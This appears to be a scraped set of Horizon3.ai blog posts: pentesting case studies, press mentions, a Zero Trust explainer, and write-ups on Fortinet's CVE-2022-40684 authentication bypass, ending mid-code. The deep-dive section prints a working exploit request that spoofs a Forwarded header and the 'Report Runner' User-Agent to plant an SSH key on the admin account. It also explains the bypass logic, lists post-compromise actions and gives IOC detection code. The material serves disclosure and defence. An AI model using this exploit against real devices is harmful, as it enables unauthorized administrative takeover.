At first, our client believed NodeZero was in error. They were diligent in their patching and their records showed a successful update for the ZeroLogon vulnerability months earlier. Our client also had evidence: reporting from Qualys and Microsoft Deployment Image Servicing and Management (DISM) showed all systems were patched, and they trusted their tools.

In this case trusting the tools was a mistake. Liberman Networks and Horizon3.ai’s customer success team investigated further and confirmed that the updates had been unsuccessful. When our client reapplied patches to the 10 servers, a subsequent test by Liberman Networks and Horizon3.ai showed that 4 of the 10 devices remained vulnerable – despite showing as patched – again – in Microsoft.

A security solution blocked security updates for 18 months.

After further analysis, our client found the problem: a misconfiguration in their EDR solution had blocked patches on the domain controllers for the past 18 months! The failures were not propagated back to the patch management system, causing their vulnerability management and monitoring tools to incorrectly report a successful patch install. After manually pushing patches to each domain controller, NodeZero was quickly re-run, proving that the problem had truly been remediated.

“This is a good experience for me to teach the team the importance of credential use and reuse. We never would have found this vulnerability without NodeZero.” — Director of Infrastructure

Patched does not equal Remediated Timeline

Lesson 2: Patching ≠ Remediation

The lesson our client learned was simple: patching is not the same as remediating. Our client followed standard best practices in their defenses. They tracked security updates to their systems, promptly patched for critical issues using industry-leading tools and verified the patches using Microsoft DISM. As they saw, the tools can be wrong, leaving organizations vulnerable to attacks.

With assistance from Horizon3.ai and Liberman Networks, our client’s IT staff improved their security profile and their internal monitoring, detection, and response skills. The IT team’s increased knowledge and confidence is generating greater trust in IT by the business. By using an offensive strategy to test its defenses, the healthcare system is evolving its cybersecurity posture to match the threat landscape that it faces.

Lesson 3: Follow Patch Tuesday with Pentest Wednesday.

According to the NIST Cyber Security Framework, organizations should validate through systematic audit and assessment that they have truly fixed vulnerabilities after deploying patches. In reality, most IT teams lack the resources to do penetration testing after every patch.

After their experience with misreported patching – with proof from Liberman Networks and NodeZero – our client added a step to “Patch Tuesday”: “Pentest Wednesday” with NodeZero to validate all patches are correctly implemented and risks are mitigated.

Download as PDF

The post Patched ≠ Remediated: Healthcare Faces an Aggressive Threat Landscape appeared first on Horizon3.ai.

Horizon3.ai Drives Global Partner-First Approach with Expansion of Partner Program

27 September 2022 at 13:16

Businesswire: 09/27/22

Horizon3.ai announced it has expanded its partner program to include new rewards, incentives, training, and tools to help partners drive more recurring revenue. The mission of the Horizon3.ai Partner Program is to drive growth opportunities for partners and position them as trusted advisors for their clients.

Read the entire article here

The post Horizon3.ai Drives Global Partner-First Approach with Expansion of Partner Program appeared first on Horizon3.ai.

Vulnerable ≠ Exploitable: A lesson on prioritization

13 September 2022 at 15:17

The Typical Approach

Pen testers, vulnerability scanners, and installed agents alert on potential vulnerabilities and breaches. You receive a list, or a notification, and you respond. Ever wonder how much of your time and effort is being wasted fixing things that don’t actually matter?

You may be surprised to hear that a large majority of all vulnerabilities are unexploitable. According to data compiled by Kenna, in 2020, only 2.7% of the vulnerabilities found appeared to be exploitable and only 0.4% of those vulnerabilities were actually observed to be exploited at all.

The prioritization of these low-risk or no-risk vulnerabilities alongside, or even above, the truly exploitable vulnerabilities can actually cause an organization’s security posture to suffer. It takes significant time and coordination to find the asset owners, bring them up to speed on the issue, prepare downtime for the asset, remediate the issue, and then confirm that the issue is remediated. Meanwhile, more critical vulnerabilities are waiting in line for their turn to be remediated. If you can’t properly prioritize, you will never secure your network.

A client came to Horizon3.ai with the goal of validating the services they were using for pentesting, vulnerability scanning and remediation. Their IT services had all been outsourced to a managed security service provider (MSSP) with a hefty price tag; they wanted to make sure they were getting what they paid for.

The MSSP had just conducted their annual pentest of the organization’s network environment. Horizon3.ai used NodeZero to assess the organization’s network, with the following comparative results:

Why Coverage and Accuracy Matter

The hardest part of cyber security is deciding what NOT to fix because of limited time and resources.

Manual Pen Testing creates an incomplete snapshot:

  • No exploits exist, or conditions to exploit are extremely unlikely, for 22/28 of the MSSP’s critical findings
  • Poor enumeration leads to blind spots and incomplete fingerprinting – port scans are not enough!
  • Partial coverage leads to missed critical findings

Fixing 79% of the critical issues highlighted in the MSSP’s report would have been an inefficient use of time and effort. These so-called “critical issues” did not have exploits, were blindly assumed due to poor enumeration, or the conditions for exploitability were extremely unlikely.

Meanwhile, the MSSP’s team only identified one host vulnerable to BlueKeep, while NodeZero found an additional 11. NodeZero also proved three additional critical/high weaknesses, including easily guessable root access to a database server.

When the noise is removed, the critical findings are revealed.

The Horizon3.ai Difference

Thinking like an attacker gives you a distinct advantage as you devise a defensive strategy.

The attacker’s perspective asks:

  • What is an attacker interested in doing or achieving?
  • What methods are realistically at their disposal?
  • What things about your environment make achieving their intentions possible, or even easy?

We believe that these questions can only be answered by an “attacker-mindset” pentest, which should be performed frequently on your entire environment so risks do not accrue, and should produce findings that guide your remediation actions with a heavy bias towards efficiency and return on investment.

Horizon3.ai delivers these outcomes through NodeZero, our autonomous penetration testing-as-a-service (APTaaS) platform. NodeZero is an on-demand, self-service platform that is safe to run in production and requires no persistent or credentialed agents.

Within our Portal, we provide the following supporting information for every weakness NodeZero finds:

  • Path NodeZero followed to identify/discover the weakness.
  • Proof of exploitability of the weakness.
  • Context and severity of the finding, which can be used to determine business impact.
  • Fix action report you can follow to remediate the weaknesses.

The Future State

Overall, the comparison between the MSSP’s report and the NodeZero report shows that NodeZero provides broader coverage, proves exploitability, contextualizes weaknesses, and provides the defensive team with the information they need to fix what matters.

Our work with this client exemplifies the need for a proactive security posture that includes continuous assessment, so you can catch up, keep up and even stay ahead.

Catch Up

Identify exploitable attack paths that must be fixed immediately, significantly reducing the opportunities for exploitation, sensitive data exposure, elevated privileges or remote code execution.

Your first NodeZero operation will provide this insight and minimize the time spent dealing with false positives.

For me, the biggest benefit is the attack path identification and actual prioritization of the vulnerabilities. Other tools simply pull the CVE value, and we get hundreds of criticals and highs.

Keep Up

Establish a purple team culture to find exploitable problems, fix them and then verify that the problems no longer exist. Your red team should be working with your blue team to maximize coordination.

You can run multiple NodeZero operations per week – our licenses give you unlimited access.
Use NodeZero’s compare feature to power your security standups.

Stay Ahead

Continuously verify your security controls – tools, processes, policies – by measuring and optimizing your detection, remediation and compliance response times.

Use our reports to show your leadership and board where you stand. Not just a compliance checkbox; this is effective security.

The post Vulnerable ≠ Exploitable: A lesson on prioritization appeared first on Horizon3.ai.

What to expect during the ‘Horizon3.ai Drives Global Partner-First Approach’ event: Join theCUBE Sept. 27

26 September 2022 at 13:44

SiliconANGLE: 09/26/22

Horizon3.ai’s partner program covers the company’s efforts for managed service providers, managed security service providers, and consultants to offer NodeZero to customers — all as part of the company’s channel-led, go-to-market strategy.

Read the entire article here

The post What to expect during the ‘Horizon3.ai Drives Global Partner-First Approach’ event: Join theCUBE Sept. 27 appeared first on Horizon3.ai.

Horizon3.ai Expands Global Partner Program, Taps Jennifer Lee to Lead

28 September 2022 at 13:53

Brilliance Security Magazine: 09/28/22

“The Horizon3.ai Partner Program enables partners to leverage the industry’s most advanced, comprehensive penetration testing available. By using NodeZero, partners can help their clients find and fix attack vectors before attackers can exploit them, then verify any issue is resolved,” said Lee.

Read the entire article here

The post Horizon3.ai Expands Global Partner Program, Taps Jennifer Lee to Lead appeared first on Horizon3.ai.

Uber Systems Breached – Full Access Claimed

16 September 2022 at 14:29

VMBlog 09/16/22

This is really just testament to the fact that almost every multi-million dollar security program is worth nothing without employee awareness, clean data hygiene practices, and constant validation of security controls through testing. We’ve seen way too many examples of credentialed attacks still being the #1 utilized attack vector for attackers.

Read the entire article here

The post Uber Systems Breached – Full Access Claimed appeared first on Horizon3.ai.

Horizon3 positions Partner Program expansion as a value-add for MSPs, MSSPs and resellers

27 September 2022 at 14:09

SiliconANGLE: 09/27/22

“First of all, there is a raising demand in penetration testing,” said Rainer Richter. “And, internationally, we have a much higher percentage of SMBs and mid-market customers. So, for them, pentesting was just too expensive. With our offering together with our partners, we can provide different ways for customers to get autonomous pentesting done more than once a year with even lower costs than they had with traditional manual pentests.”

Read the entire article here

The post Horizon3 positions Partner Program expansion as a value-add for MSPs, MSSPs and resellers appeared first on Horizon3.ai.

Horizon3.ai Drives Global Partner-First Approach with Expansion of Partner Program

27 September 2022 at 14:11

AITHORITY: 09/27/22

“Most MSSPs and VARs don’t have the talent for pentesting, and trying to staff this position can be incredibly difficult,” said Christopher Prewitt, CTO of Inversion6. “Partnering with Horizon3.ai has been a game changer for us, as it’s allowed us not only to perform new services for our customers, but also provide a product where customers can pentest their own network – both internally and externally.”

Read the entire article here

The post Horizon3.ai Drives Global Partner-First Approach with Expansion of Partner Program appeared first on Horizon3.ai.

Horizon3.ai Promotes Global Partner-First Approach with Expansion of Partner Program

28 September 2022 at 14:13

ITSecurityWire: 09/28/22

“The driving force behind creating our new partner program really aligns with our channel-first commitment and how we go-to-market,” said Snehal Antani, CEO and co-founder of Horizon3.ai. “Autonomous pentesting enables the next-generation of security assessments.

Read the entire article here

The post Horizon3.ai Promotes Global Partner-First Approach with Expansion of Partner Program appeared first on Horizon3.ai.

81% of Companies Suffered A Cloud Security Incident Last Year – Horizon3.ai

30 September 2022 at 14:41

Information Security Buzz: 09/30/22

Over the past year, studies show that companies with cloud-based security solutions have had at least one security incident in their cloud environment. In contrast, cloud-based security is likely more “up-to-date” than on-premises solutions as the cloud-based security company maintains its solution in compliance with industry standards.

Read the entire article here

The post 81% of Companies Suffered A Cloud Security Incident Last Year – Horizon3.ai appeared first on Horizon3.ai.

Three things you might have missed from the ‘Horizon3.ai Drives Global Partner-First Approach’ event

3 October 2022 at 14:46

SiliconANGLE: 10/03/22

For enterprise cybersecurity initiatives to be effective today, they must be continuous and proactive. Organizations simply can’t risk a real breach to test their security mettle. But what does it take for cybersecurity strategies to be deemed proactive? Usually, it implies a balanced mix of observability and continuous verification.

Read the entire article here

The post Three things you might have missed from the ‘Horizon3.ai Drives Global Partner-First Approach’ event appeared first on Horizon3.ai.

BOD 23-01 – Fed Civilian Agencies Must Report Network Vulns To CISA – Expert Comments

5 October 2022 at 14:44

Information Security Buzz: 10/05/22

CISA Director Jen Easterly announced a new Binding Operational Directive (BOD 23-01) on Monday requiring all Federal civilian agencies to report detailed data about vulnerabilities to CISA at timed intervals using automated tools. Snehal Antani commented, “Typically, attackers know more about your enterprise than you do. They gain initial access into your enterprise, discover all of your assets, and plan angles of attack to achieve their objectives. It’s critical for all organizations, including Federal agencies, to view their enterprises through the eyes of an attacker to ensure they don’t have rogue, misconfigured, or vulnerable assets on their network that could lead to a compromise.”

Read the entire article here

The post BOD 23-01 – Fed Civilian Agencies Must Report Network Vulns To CISA – Expert Comments appeared first on Horizon3.ai.

FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass IOCs (CVE-2022-40684)

11 October 2022 at 19:33

Introduction

The recent FortiOS / FortiProxy / FortiSwitchManager CVE has been reportedly exploited in the wild. We would like to provide additional insight into the vulnerability so users can begin to determine if they have been compromised. In this post we discuss enabling logging and IOCs for FortiOS 7.2.1. These steps will likely work on other vulnerable products, however we do not have other products configured in our lab for testing. Additionally, we will be releasing a technical deep dive and POC for this CVE later this week.

Logging

If not already configured, REST API logging can be set through the Fortinet CLI with the following commands:

fortios_7_2_1 # config log setting
fortios_7_2_1 (setting) # set rest-api-set enable
fortios_7_2_1 (setting) # set rest-api-get enable
fortios_7_2_1 (setting) # end
fortios_7_2_1 # 

IOCs

In addition to the recommendations by Fortinet to check the device’s log for user="Local_Process_Access", any affected system should also be checked for logs with user_interface="Node.js" or user_interface="Report Runner". See the screenshots below for examples of the exploit running on our lab systems.

node js log

report runner log

The exploit can be used with any HTTP method (GET, POST, PUT, DELETE, etc). Additionally, the REST API request failing is not an indication that an attacker was unsuccessful. In our lab environment, we were able to modify the admin users’ SSH keys through a REST API request that reportedly failed. We would also like to note that a system configured for production use may produce logs that match these IOCs naturally. However, we would not expect these IOCs to match with URLs targeting sensitive REST API endpoints.

Attacker Mindset

The collection of /api/v2/ endpoints can be used to configure the system and modify the administrator user. Any logs found that meet the above conditions and also have a URL containing /api/v2/ should be cause for concern. Further investigation of any matching log entries can reveal the damage an attacker has done. Additionally, an attacker may perform the following actions to further compromise a system:

  • Modify the admin users’ SSH keys to enable the attacker to log in to the compromised system.
  • Add new local users.
  • Update networking configurations to reroute traffic.
  • Download the system configuration.
  • Initiate packet captures to capture other sensitive system information.
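A small detector for the IOCs listed above, run over constructed FortiOS-style log lines, as an added example that is not Fortinet’s or Horizon3.ai’s code. It flags entries with user_interface="Node.js" or "Report Runner", or user="Local_Process_Access", escalates when the URL is under /api/v2/, and deliberately ignores the request status, since the post notes that a "failed" REST call does not mean the attacker failed; the field names url, method and status and the sample lines are assumptions.

```python
# Added example (not Fortinet's or Horizon3.ai's code): a small detector
# for the IOCs listed above, run over constructed FortiOS-style log lines.
# Assumptions: log lines are space-separated key=value pairs with quoted
# values, and the field names url, method and status are assumed.
import re
from typing import Optional

KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
SUSPECT_INTERFACES = {"Node.js", "Report Runner"}
SUSPECT_USERS = {"Local_Process_Access"}
SENSITIVE_PREFIX = "/api/v2/"


def parse_fortios_log(line: str) -> dict:
    """Split a key=value log line into a dict, stripping surrounding quotes."""
    fields = {}
    for key, raw in KV_RE.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return fields


def classify(fields: dict) -> Optional[str]:
    """'ioc' when an IOC field matches and the URL is under /api/v2/,
    'review' when only the IOC field matches, None otherwise. The request
    status is deliberately ignored: a "failed" REST call is not evidence
    that the attacker failed."""
    matches = (fields.get("user_interface") in SUSPECT_INTERFACES
               or fields.get("user") in SUSPECT_USERS)
    if not matches:
        return None
    return "ioc" if SENSITIVE_PREFIX in fields.get("url", "") else "review"


def scan(lines):
    """Return (verdict, method, url, status) for every flagged line."""
    hits = []
    for line in lines:
        fields = parse_fortios_log(line)
        verdict = classify(fields)
        if verdict is not None:
            hits.append((verdict, fields.get("method", "?"),
                         fields.get("url", "?"), fields.get("status", "?")))
    return hits


# Constructed sample lines; only the key=value layout mimics FortiOS logs.
SAMPLE_LOGS = [
    # Normal admin activity through the GUI: not flagged.
    'date=2022-10-11 time=09:00:00 type="event" subtype="system" level="information" '
    'user="admin" ui="https(10.0.0.5)" action="Edit" msg="Edit system.admin admin"',
    # Node.js interface hitting a config endpoint; status is "failed" yet still an IOC.
    'date=2022-10-11 time=09:00:05 type="event" subtype="system" user_interface="Node.js" '
    'method="PUT" url="/api/v2/cmdb/system/admin/admin" status="failed" msg="Edit system.admin"',
    # Report Runner interface pulling a config backup.
    'date=2022-10-11 time=09:00:07 type="event" subtype="system" user_interface="Report Runner" '
    'method="GET" url="/api/v2/monitor/system/config/backup" status="success"',
    # Fortinet's own indicator, user=Local_Process_Access.
    'date=2022-10-11 time=09:00:09 type="event" subtype="system" user="Local_Process_Access" '
    'user_interface="Node.js" method="GET" url="/api/v2/monitor/system/status" status="success"',
    # IOC field matches but the URL is harmless: worth a look, not an alert.
    'date=2022-10-11 time=09:00:11 type="event" subtype="system" user_interface="Node.js" '
    'method="GET" url="/favicon.ico" status="success"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit)
```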

The post FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass IOCs (CVE-2022-40684) appeared first on Horizon3.ai.

What is Zero Trust – and How NodeZero Can Help

13 October 2022 at 15:41

Zero Trust. Everyone’s talking about it, but what does it truly mean, and how can you prove that your organization is using a Zero Trust model effectively?  

Where did Zero Trust come from? For the security veterans among us, we remember the old network security adage: inside the network was trusted, and outside of the network was untrusted. Think of the old castle-and-moat image commonly used to describe a network. This perimeter-based approach doesn’t work in today’s modern and agile threat landscape. Additionally, the implicit trust assumed with “inside” the network invokes risk. Hackers no longer hack in – they log in. Your Zero Trust framework goes out the door when an attacker gets in and creates their own trust.  

Modern workplaces have evolved. Gone are the days when everyone walks into a brick-and-mortar building for work. To get the best talent and the most flexibility in today’s evolving business world, remote work has become ubiquitous, and that means you’ve got personnel requesting access to your network from everywhere. You can’t build a moat big enough to protect a network that varied.  

The core tenets of Zero Trust are pretty clear: no one receives automatic trust from your network; if you’re going to grant access, grant only the access required and no more; verify that person’s identity before granting access; and do not assume that once the person (or device) is verified, they are always who they say they are – constantly re-verify to be safe. 

How does this framework align with autonomous pentesting? 

Representation of ZTNA in a stylized graphic form.

Defining ZTA  

Let’s start with some baseline understanding. Rather than implying trust because of the user’s network location, Zero Trust believes that network location or IP addresses do not imply trust – it instead looks at identity and context. To put it simply: no one is trusted inside or outside the network without having their identity verified. Remember the old castle and moat analogy? Once you were on the right side of the moat (to the network), you were trusted. But with Zero Trust, identity authentication, not location, is how organizations keep their data safe.  

The name “Zero Trust” is born of the “default deny” posture. If a user or device wants access to anything, they must be verified or that access is denied. And when we accept that hackers don’t hack in, they log in, your credentials and authentication are that much more valuable to your business, and to an attacker. If attackers are looking for credentials as the keys to your crown jewels, ensuring usernames and passwords are being used only by who they should be is a top priority. 

Least privilege 

The next tenet of Zero Trust: least privilege. If a user requests access to a document, application, folder, or so on, they are granted access to that resource and nothing more. It’s not unlike locking down a building – not every employee needs a skeleton key to every room in your headquarters. If they lose that passkey and it falls into the wrong hands, a dangerous stranger could be weaving in and out of your entire property. The same principle applies here. 

The trust that is given is ephemeral (time-bound) and continually reevaluated. That user or device is re-verified with new requests to ensure they are who they say they are before further access is granted. Identities are verified through measures like multi-factor authentication, endpoint verification, or even physical keys provided by the organization linked to the user’s identity.  

Who, what, and where  

Zero Trust focuses on more than user identity; it also involves knowing what devices are on your network. With the explosion of cloud services and the proliferation of work-from-home users, a company’s attack surface has changed dramatically, and will continue to. This is one more reason Zero Trust frameworks are resonating. For example, home users are often criticized for leaving default passwords or factory settings on Internet of Things (IoT) devices like baby monitors or home security cameras, but businesses have taken on that same risk, knowingly or not. With the number of devices that can be tied to a business’s network (including employee home networks), the professional world is as much at risk, if not more, and it’s up to the security practitioners at these organizations to know every asset on their network: hosts and people (credentials) alike. Understanding your environment is key to a Zero Trust framework.

How NodeZero can help   

At Horizon3.ai, our core mission is: continuously verify your security posture. NodeZero does this and does it fast, identifying assets that are reachable, vulnerable, and exploitable. It looks for usernames and weak passwords that would allow hackers to log in easily. It also chains vulnerabilities, misconfigurations, or dangerous default settings and credentials, just like an attacker would in order to delve deeper and persist longer in your network.  

The hardest part of cybersecurity is deciding what not to do. Horizon3.ai understands that no one has enough time to do everything they need to do; new risks, vulnerabilities, and threats emerge all the time. Prioritization, so you can fix what matters most, is a dire need for even the best security professionals. NodeZero context-scores every weakness, host, and credential based on your environment and on the impact that compromising that asset led to. NodeZero provides the path with proof, so you know exactly how your “crown jewels” were discovered, and even provides fix actions so you know how to remediate the attack paths immediately.

And similar to Zero Trust access, our philosophy is always verify. NodeZero can be re-run immediately – and as often as you need to – in order to make sure the fix actions you have taken are in effect. Don’t wait for an annual pentest or an actual data breach to find out you missed a misconfiguration or if a patch wasn’t completed.   

Zero Trust isn’t a single tool; it’s a philosophy and a framework. That means, for many organizations, Zero Trust is cobbled together from various tools, policies, and practices. A cobbled-together system, no matter how well thought out, will have blind spots and weak links where tools that were never designed to work together meet. NodeZero’s find, fix, verify loop can find the chinks in the armor of an organization’s Zero Trust plan so those gaps are identified, repaired, and confirmed to be working. Introduced a new tool or process? NodeZero can act fast to ensure no new risks have been introduced before someone else finds them.

Everyone has blind spots – we’re human. NodeZero’s autonomous pentesting is a force multiplier for identifying those blind spots so you can shine a light on them and secure them before a bad actor can make use of them. 

Want to learn more about NodeZero? Set up a demo today 

The post What is Zero Trust – and How NodeZero Can Help appeared first on Horizon3.ai.

Horizon3.ai Named Finalist for Cloud Security Innovation of the Year in 2022 SDC Awards

13 October 2022 at 16:33

Businesswire: 10/13/22

The SDC Awards recognize and reward products and services that are the foundation for digital transformation. NodeZero has been named a ‘Cloud Security Innovation of the Year’ finalist. NodeZero was selected for its impact on the market and value provided to customers and partners.

Read the entire article here

The post Horizon3.ai Named Finalist for Cloud Security Innovation of the Year in 2022 SDC Awards appeared first on Horizon3.ai.

FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass Technical Deep Dive (CVE-2022-40684)

13 October 2022 at 16:45

Introduction

Fortinet recently patched a critical authentication bypass vulnerability in their FortiOS, FortiProxy, and FortiSwitchManager products (CVE-2022-40684). This vulnerability gives an attacker the ability to log in as an administrator on the affected system. To demonstrate the vulnerability in this writeup, we will be using FortiOS version 7.2.1.

POC

Let’s examine the inner workings of this vulnerability. You can find our POC here. The vulnerability is used below to add an SSH key to the admin user, enabling an attacker to SSH into the affected system as admin.

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: 10.0.40.67
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";
Content-Length: 612

{
  "ssh-public-key1": "\"ssh-rsa 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 [email protected]\""
}

Deep Dive

FortiOS exposes a management web portal that allows a user to configure the system. Additionally, a user can SSH into the system, which exposes a locked-down CLI. Our first step, after familiarizing ourselves with the system, was to diff the vulnerable firmware against the patched firmware.

Firmware Examination

We obtained a VMware zip file of the firmware which contained two vmdk files. First, we examined the vmdk files with virt-filesystems and mounted them with guestmount:

$>ls *.vmdk
datadrive.vmdk fortios.vmdk
$>sudo virt-filesystems --filesystems -a fortios.vmdk 
/dev/sda1
$>sudo mkdir fortios_mount
$>sudo guestmount -a fortios.vmdk -m /dev/sda1 --ro fortios_mount
$>cd fortios_mount
$>ls
boot.msg datafs.tar.gz extlinux.conf filechecksum flatkc flatkc.chk ldlinux.c32 ldlinux.sys lost+found rootfs.gz rootfs.gz.chk

Next, we extract the root filesystem, where we find a handful of .tar.xz files:

$>sudo cp ../fortios_mount/rootfs.gz .
$>gunzip rootfs.gz 
$>cpio -i 2> /dev/null < rootfs 
$>ls
bin.tar.xz bin.tar.xz.chk boot data data2 dev etc fortidev init lib lib64 migadmin.tar.xz node-scripts.tar.xz proc rootfs sbin sys tmp usr usr.tar.xz usr.tar.xz.chk var

Interestingly, attempting to decompress the xz files fails with corruption errors:

$>xz --decompress *.xz
xz: bin.tar.xz: Compressed data is corrupt
xz: migadmin.tar.xz: Compressed data is corrupt
xz: node-scripts.tar.xz: Compressed data is corrupt
xz: usr.tar.xz: Compressed data is corrupt

It’s unclear whether this is an attempt at obfuscation, but we find a version of xz in the sbin folder of the firmware. We can’t run it as is, but we can patch its interpreter (dynamic linker) path to point at our system’s linker and finally decompress the files:

$>xz --decompress *.xz
xz: bin.tar.xz: Compressed data is corrupt
xz: migadmin.tar.xz: Compressed data is corrupt
xz: node-scripts.tar.xz: Compressed data is corrupt
xz: usr.tar.xz: Compressed data is corrupt
$>find . -name xz
./sbin/xz
$>./sbin/xz --decompress *.xz
bash: ./sbin/xz: No such file or directory
$>file ./sbin/xz
./sbin/xz: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /fortidev/lib64/ld-linux-x86-64.so.2, BuildID[sha1]=eef5d20a9f8760df951ed122a5faf4de86a7128a, for GNU/Linux 3.2.0, stripped
$>patchelf --set-interpreter /lib64/ld-linux-x86-64.so.2 sbin/xz
$>./sbin/xz --decompress *.xz
$>ls *.tar
bin.tar migadmin.tar node-scripts.tar usr.tar

Next, we untar the files and begin examining their contents. We find that /bin contains a large collection of binaries, many of which are symlinks to /bin/init. The migadmin folder appears to contain the frontend web code for the administrative interface. The node-scripts folder appears to contain a Node.js backend for the administrative interface. Lastly, the usr folder contains a libraries folder and an apache2 configuration folder.

The Patch

We apply the same steps to firmware version 7.2.2 to enable diffing of the filesystems. In the bin folder, we find that the large init binary has changed, and in the node-scripts folder we find that the index.js file has changed:

index.js diff

This diff shows that the httpsd proxy handler now explicitly sets the forwarded, x-forwarded-vdom, and x-forwarded-cert headers. This gives us a hint as to where to start looking for clues on how to exploit this vulnerability.
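The filesystem diff step above can be scripted. The following Python tool is an added example, not Fortinet's or Horizon3.ai's tooling: it hashes every regular file in two extracted trees, records symlinks by target so the many /bin links to init are not re-hashed as copies of the large binary, and reports what was added, removed or changed. The two directory layouts built in demo() are constructed stand-ins for the 7.2.1 and 7.2.2 trees, not the real firmware contents.

```python
"""Added example: compare two extracted firmware trees by content hash.

Illustrative code for this article, not Fortinet's or Horizon3.ai's tooling.
The directory names and file contents in demo() are constructed."""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List


def tree_hashes(root: Path) -> Dict[str, str]:
    """Map each entry's path (relative to root) to a fingerprint.

    Regular files get their SHA-256; symlinks are recorded by target rather
    than followed, so links such as /bin/<tool> -> init stay cheap and are
    reported as link changes only if the target changes.
    """
    out: Dict[str, str] = {}
    for path in root.rglob("*"):
        rel = path.relative_to(root).as_posix()
        if path.is_symlink():
            out[rel] = "link:" + os.readlink(path)
        elif path.is_file():
            h = hashlib.sha256()
            with path.open("rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 20), b""):
                    h.update(chunk)
            out[rel] = h.hexdigest()
    return out


def diff_trees(old: Path, new: Path) -> Dict[str, List[str]]:
    """Return entries added, removed or changed between two extracted trees."""
    a, b = tree_hashes(old), tree_hashes(new)
    return {
        "added": sorted(set(b) - set(a)),
        "removed": sorted(set(a) - set(b)),
        "changed": sorted(p for p in set(a) & set(b) if a[p] != b[p]),
    }


def demo() -> Dict[str, List[str]]:
    """Build two tiny constructed trees shaped like the bin/ and node-scripts/
    folders from the write-up, then diff them."""
    with tempfile.TemporaryDirectory() as tmp:
        old, new = Path(tmp, "fw_7_2_1"), Path(tmp, "fw_7_2_2")
        for root, init_body, index_body in (
            (old, b"INIT v1", b"// index.js (old)\n"),
            (new, b"INIT v2", b"// index.js (new)\n"),
        ):
            (root / "bin").mkdir(parents=True)
            (root / "node-scripts").mkdir()
            (root / "bin" / "init").write_bytes(init_body)
            os.symlink("init", root / "bin" / "httpsd")   # a link, like the real /bin
            (root / "node-scripts" / "index.js").write_bytes(index_body)
            (root / "node-scripts" / "package.json").write_bytes(b"{}")
        (new / "node-scripts" / "new-helper.js").write_bytes(b"// added\n")
        return diff_trees(old, new)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Run it against the two untarred trees (for example diff_trees(Path("fw_7_2_1"), Path("fw_7_2_2"))) and the "changed" list is the set of files worth opening in a decompiler or diff viewer first.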

HTTPSD and Apache Handlers

After some searching, we discover that the init binary mentioned earlier contains strings matching the headers in the Node.js diff. This init binary is rather large and appears to have a lot of functionality, including Apache hooks and handlers for various management REST API endpoints. To aid our research, we SSH’d into the system and enabled debug output for the httpsd process:

fortios_7_2_1 # diagnose debug enable 
fortios_7_2_1 # diagnose debug application httpsd -1
Debug messages will be on for 5 minutes.
fortios_7_2_1 # diagnose debug cli 8
Debug messages will be on for 5 minutes.

While investigating the forwarded header, we find an Apache access_check_ex hook that parses the header, extracts the for and by fields, and attaches them to the Apache request_rec structure. You can see that the for field allows us to set the client_ip field on the request record’s connection.

forwarded header parsing

Additionally, we see a log message that mentions which handler is used for a particular request.

[httpsd 12478 - 1665412044     info] fweb_debug_init[412] -- Handler "api_cmdb_v2-handler" assigned to request

After searching for the handler string, we find an array of handlers in the init binary:

handler array

After investigating some of the handlers, we find that many of them make a call to a function we named api_check_access:

api_check_access

We were immediately drawn to api_check_access_for_trusted_source which first checks if the vdom socket option is trusted, but then falls through to a function we called is_trusted_ip_and_user_agent.

is_trusted_ip_and_user_agent

You can see that this function checks that the client_ip is “127.0.0.1” and that the User-Agent header matches its second parameter. The function is called with two possible values for that parameter: “Node.js” and “Report Runner”. The “Node.js” path seems to perform some additional validation, but using “Report Runner” allows us to bypass authentication and perform API requests!

Weaponization

The ability to make unauthenticated requests to the REST API is extremely powerful. However, we noticed that we could not add or change the password for the admin user. To get around this, we updated the admin user’s SSH keys to allow us to SSH to the target as admin. See our original announcement.

Summary

To wrap things up, here is an overview of the conditions a request must meet to exploit this vulnerability:

  1. Using the Forwarded header, an attacker is able to set the client_ip to “127.0.0.1”.
  2. The “trusted access” authentication check verifies that the client_ip is “127.0.0.1” and the User-Agent is “Report Runner”, both of which are under attacker control.

Any HTTP request to the management interface of the system that matches the conditions above should be cause for concern. An attacker can use this vulnerability to do just about anything they want to the vulnerable system, including changing network configurations, adding new users, and initiating packet captures. Note that this is not the only way to exploit this vulnerability, and there may be other sets of conditions that work. For instance, a modified version of this exploit uses the User-Agent “Node.js”. This exploit follows a trend among recently discovered enterprise software vulnerabilities in which HTTP headers are improperly validated or overly trusted. We have seen this in recent F5 and VMware vulnerabilities.
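The root cause described under is_trusted_ip_and_user_agent, and the detection advice in this summary, come down to one design mistake: an authorization check that reads the client address from a header the client itself supplies. The Python below is an added example written for this page, not FortiOS code. flawed_trust_check is this example's reconstruction of the logic the write-up describes (the function names here are the example's own, chosen to avoid implying they are the binary's routines), hardened_trust_check is the example's proposed fix, and the log format and log lines are constructed, using RFC 5737 documentation addresses. The detector reuses the flawed check itself: any request from a non-loopback peer that the flawed logic would have trusted is, by definition, shaped like the bypass.

```python
"""Added example (not FortiOS code): why a client-controlled Forwarded header
must never feed an authorization decision, and a log check for requests that
match the conditions in the summary.

flawed_trust_check reconstructs the described logic; the hardened variant,
the log format and the sample log lines are all constructed for this demo."""
import re
from typing import Dict, List, Optional

LOOPBACK = "127.0.0.1"
PRIVILEGED_AGENTS = ("Report Runner", "Node.js")  # User-Agents the flawed check trusts

# First `for=` node of an RFC 7239 Forwarded header, covering the forms
#   for="[127.0.0.1]:8000"   for=127.0.0.1   for="192.0.2.43:47011"
FOR_FIELD = re.compile(
    r'for="?(?:\[(?P<br>[0-9a-fA-F.:]+)\]|(?P<plain>[0-9.]+))(?::\d+)?"?', re.I)


def forwarded_for(headers: Dict[str, str]) -> Optional[str]:
    """Return the address named by Forwarded: for=..., or None if absent."""
    m = FOR_FIELD.search(headers.get("Forwarded", ""))
    return (m.group("br") or m.group("plain")) if m else None


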